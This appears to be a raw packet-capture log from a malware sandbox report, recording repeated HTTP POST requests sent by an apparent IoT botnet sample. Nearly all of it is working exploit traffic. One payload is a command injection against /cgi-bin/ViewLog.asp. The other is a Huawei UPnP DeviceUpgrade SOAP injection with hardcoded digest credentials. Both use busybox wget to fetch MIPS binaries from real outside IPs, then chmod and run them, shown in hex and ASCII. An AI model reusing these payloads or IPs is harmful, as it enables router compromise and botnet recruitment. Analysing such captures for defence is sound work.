                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              561192.168.2.143529895.164.131.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.073617935 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.175023079 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/6.0.0-20220501-re899e0c27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:17:53 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3572
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Cache-Status: ezproxies.com
                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              562192.168.2.143901285.122.198.1628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.100557089 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              563192.168.2.143766694.158.155.1948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.110205889 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              564192.168.2.144837631.200.40.1818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.110269070 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              565192.168.2.143827895.211.184.2068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.151462078 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.475851059 CET1340INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:17:53 GMT
                                              Server: Apache/2.4.54 (Debian)
                                              X-Powered-By: PHP/8.0.26
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              Link: <https://www.vbmh.nl/wp-json/>; rel="https://api.w.org/"
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 33 61 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 2d 4e 4c 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 62 6d 68 2e 6e 6c 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 62 6d 68 2e 6e 6c 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 31 32 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2d 31 2e 70 6e 67 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 69 6e 61 20 6e 69 65 74 20 67 65 76 6f 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 56 42 4d 48 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 76 62 6d 68 2e 6e 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6b 69 74 2e 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 56 42 4d 48 20 26 72 61 71 75 6f 3b 20 66 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 62 6d 68 2e 6e 6c 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72
                                              Data Ascii: 3a8c<!DOCTYPE html><html lang="nl-NL"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <link rel="pingback" href="http://www.vbmh.nl/xmlrpc.php" /> <link href="https://www.vbmh.nl/wp-content/uploads/2022/12/favicon-32x32-1.png" rel="icon"> <title>Pagina niet gevonden &#8211; VBMH</title><meta name='robots' content='noindex, nofollow' /><link rel='dns-prefetch' href='//www.vbmh.nl' /><link rel='dns-prefetch' href='//kit.fontawesome.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='preconnect' href='https://fonts.gstatic.com' crossorigin /><link rel="alternate" type="application/rss+xml" title="VBMH &raquo; feed" href="https://www.vbmh.nl/feed/" /><link r


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              566192.168.2.145472294.122.29.2518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.199563026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              567192.168.2.145760694.120.36.998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:53.750516891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.761718035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              568192.168.2.144748494.120.12.1558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.212402105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              569192.168.2.1443244156.226.11.9037215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.238533974 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:58.273693085 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:04.417428017 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
